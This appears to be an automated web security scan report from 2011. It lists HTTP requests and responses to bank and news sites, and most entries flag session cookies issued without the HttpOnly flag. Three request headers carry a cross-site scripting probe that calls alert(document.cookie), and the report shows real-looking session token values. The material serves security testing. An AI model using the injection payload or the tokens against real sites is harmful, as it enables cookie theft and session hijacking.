GET /pages/jpmorgan/home/publicsector HTTP/1.1 Host: www.jpmorgan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501;
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Fri, 04-Feb-2011 01:34:32 GMT Date: Thu, 03 Feb 2011 01:16:46 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 host_service: FutureTenseContentServer:6.3.0 X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: JpmcSession=ZnCLNKBp7KKQH0Lj93TByDF7HqFmm2TFz1KdT1wdzzw3MJ2hCdpY!-1882927501; path=/ P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http: ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cron_image.html HTTP/1.1 Host: www.macaudailytimes.com.mo Proxy-Connection: keep-alive Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VivvoSessionId=3a9063f24d4a054f92c63
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /imagecode.html?article_id=21109 HTTP/1.1 Host: www.macaudailytimes.com.mo Proxy-Connection: keep-alive Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VivvoSessionId=3a9063f24d4a054f92c63
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/lang.php HTTP/1.1 Host: www.macaudailytimes.com.mo Proxy-Connection: keep-alive Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VivvoSessionId=3a9063f24d4a054f92c63
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /times-lab/21109-Tragedy-our-Commons.html HTTP/1.1 Host: www.macaudailytimes.com.mo Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fnmsonline/fnms_ms_login.asp HTTP/1.1 Host: www.merchantsummary.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 176 Content-Type: text/html Location: https://www.Merchantsummary.com/fnms_ms_login.aspx?nb=1 X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDQEQCQCRA=BOIHGBOAAICKLCDGOIBCPALB; secure; path=/ Date: Wed, 02 Feb 2011 22:19:30 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="https://www.Merchantsummary.com/fnms_ms_login.aspx?nb=1">here</a>.</body>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /my/charteroneinvest HTTP/1.1 Host: www.mystreetscape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: FWS/7.0 Date: Wed, 02 Feb 2011 22:19:32 GMT P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi" Set-cookie: MC=ICnV^lPuGcmwLOC9l5HCSfEXjIkSAk1J2HQKA0w6IAAOywABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT Set-cookie: spc=311; path=/ Cache-control: public Set-cookie: HttpOnly Set-cookie: JSESSIONID=48E9C3976D90BB921D5C93D8E938BE52; path=/; secure Content-length: 264 Content-type: text/html Fsreqid: REQ4d49d8740a034c3a20000ecb0000aa33 Fscalleeid: ibweb311 Fselapsedtime: 9719 Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /my/citizensinvest HTTP/1.1 Host: www.mystreetscape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: FWS/7.0 Date: Wed, 02 Feb 2011 22:19:32 GMT P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi" Set-cookie: MC=^dlv6nLB_DEtlMTGowZrrNRWb_gSAk1J2HQKA0w6IAAO3QABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT Set-cookie: spc=321; path=/ Cache-control: public Set-cookie: HttpOnly Set-cookie: JSESSIONID=7117D3482F67F60B23716F580E8C6714; path=/; secure Content-length: 259 Content-type: text/html Fsreqid: REQ4d49d8740a034c3a20000edd0000aa33 Fscalleeid: ibweb321 Fselapsedtime: 9769 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /generalinfo.asp HTTP/1.1 Host: www.oneofacard.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Connection: close Date: Wed, 02 Feb 2011 22:32:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /generalinfo2.asp Content-Length: 138 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSABQSCC=CGBGOCGAHLGCAJHNOCOBCPKB; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/generalinfo2.asp">here</a>.</body>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /generalinfo.asp HTTP/1.1 Host: www.oneofacard.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Connection: close Date: Wed, 02 Feb 2011 22:19:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /generalinfo2.asp Content-Length: 138 Content-Type: text/html Set-Cookie: ASPSESSIONIDQARBSQDD=LANFCHGAPKNKIBJOHFFMMEGK; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/generalinfo2.asp">here</a>.</body>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /generalinfo2.asp HTTP/1.1 Host: www.oneofacard.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:19:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 4353 Content-Type: text/html Set-Cookie: ASPSESSIONIDQARBSQDD=MANFCHGAJMLLDLMDMBKANAFE; path=/ Cache-control: private
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /alservlet/ForgotUserIdServlet HTTP/1.1 Host: www.onlinebanking.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /alservlet/OnlineBankingServlet HTTP/1.1 Host: www.onlinebanking.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <html> <head> <title>PNC Bank Online Banking</title> <meta http-equiv="Expires" content=" ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/gpl-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/sec/Forms.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/sec/ProductsAndService.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/Blank.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/Gateway.do?siteArea=/pnccorp/PNC/Home HTTP/1.1 Host: www.pnc.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993
PNCSessionCookie=/pnccorp/PNC/Home/Small Business; Expires=Thu, 02 Feb 2012 23:45:33 GMT; Path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /webapp/unsec/Homepage.do?siteArea=/pnccorp/PNC/Home/Small+Business HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/Homepage.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/NCProductsAndService.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/ProductsAndService.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/Solutions.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/depositRates/init.app HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/homeEquity/init.app HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.retirementgold.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 156 Content-Type: text/html Location: https://www.retirementgold.com/fnbo Set-Cookie: ASPSESSIONIDAAQSTCQQ=GLLJBHGAIDPLDGIHHBMDKOAH; path=/ Date: Wed, 02 Feb 2011 22:20:27 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="https://www.retirementgold.com/fnbo">here</a>.</body>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pnc/ HTTP/1.1 Host: www.smart-hsa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news_detail.asp HTTP/1.1 Host: www.thestandard.com.hk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Thu, 03 Feb 2011 01:17:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 339 Content-Type: text/html Set-Cookie: ASPSESSIONIDSSCSSRSQ=JECBPJKAJCJNPMKCCLGBEBJC; path=/ Cache-control: private
<html>
<HTML> <font face="Arial" size=2> <p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e21'</font> <p> <font face="Arial" size=2>ODBC driver does no ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /transactionservices/home/ HTTP/1.1 Host: www.transactionservices.citigroup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: "" Date: Wed, 02 Feb 2011 22:20:31 GMT Content-type: text/html; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: JSESSIONID=tMY9NJYPQF122mSCD1GNnsZQnSSyyv3QpvnSKh2Ypv5JW6nqjhxH!-455328445; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /transactionservices/home/tts/ HTTP/1.1 Host: www.transactionservices.citigroup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: "" Date: Wed, 02 Feb 2011 22:20:30 GMT Content-type: text/html; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: JSESSIONID=0yg9NJYTFn3FQBd5JQK18jnv4gSG01x3vm7SW1QsyXG3TzWNSck0!-455328445; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.transunion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:20:31 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000QTy7kEmBMIWQOU_kw9iWUqa:11ele8d69; Path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 23735
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>TransUnion - Check Your ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=h5pmndrdvp301roj3gb031t642; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Science_News/2011/01/07/Blue-fin-tuna-sells-for-400000-in-Tokyo/UPI-23331294451264/ HTTP/1.1 Host: www.upi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:17:32 GMT Server: Apache/2.2.15 (Unix) PHP/5.3.3 X-Powered-By: PHP/5.3.3 Set-Cookie: PHPSESSID=h5pmndrdvp301roj3gb031t642; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 66058
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Blue fin tuna ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.viglink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Wed, 02 Feb 2011 23:45:27 GMT Expires: -1 Pragma: no-cache Set-Cookie: vglnk.Agent.p=38d8b11a817b037b4b6a4f8ea1982e0a; Domain=.viglink.com; Expires=Sat, 30-Jan-2021 23:45:27 GMT; Path=/ Set-Cookie: JSESSIONID=850E1DB3E66B214055AFE3AAEB898474; Path=/ Vary: Accept-Encoding Connection: Close Content-Length: 14626
<!doctype html> <html lang="en" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title>Affiliate Every Link on the Web with VigLink</title>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /globalgateway/main.jsp HTTP/1.1 Host: www.visa.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /enroll HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /espanol HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /foundation/v/index.jsp HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /helpcenter HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home-equity HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
